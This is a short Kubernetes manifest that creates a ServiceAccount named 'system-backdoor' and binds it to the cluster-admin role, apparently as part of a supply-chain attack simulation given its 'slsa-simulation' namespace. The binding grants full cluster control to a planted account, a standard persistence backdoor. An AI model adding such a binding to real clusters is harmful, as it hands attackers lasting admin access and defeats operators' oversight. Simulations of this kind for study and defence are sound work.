apiVersion: v1
kind: ServiceAccount
metadata:
  name: system-backdoor
  namespace: slsa-simulation
---
apiVersion: rbac.authorization.k8s.io/v1
kind: ClusterRoleBinding
metadata:
  name: system-backdoor-admin
roleRef:
  apiGroup: rbac.authorization.k8s.io
  kind: ClusterRole
  name: cluster-admin
subjects:
- kind: ServiceAccount
  name: system-backdoor
  namespace: slsa-simulation
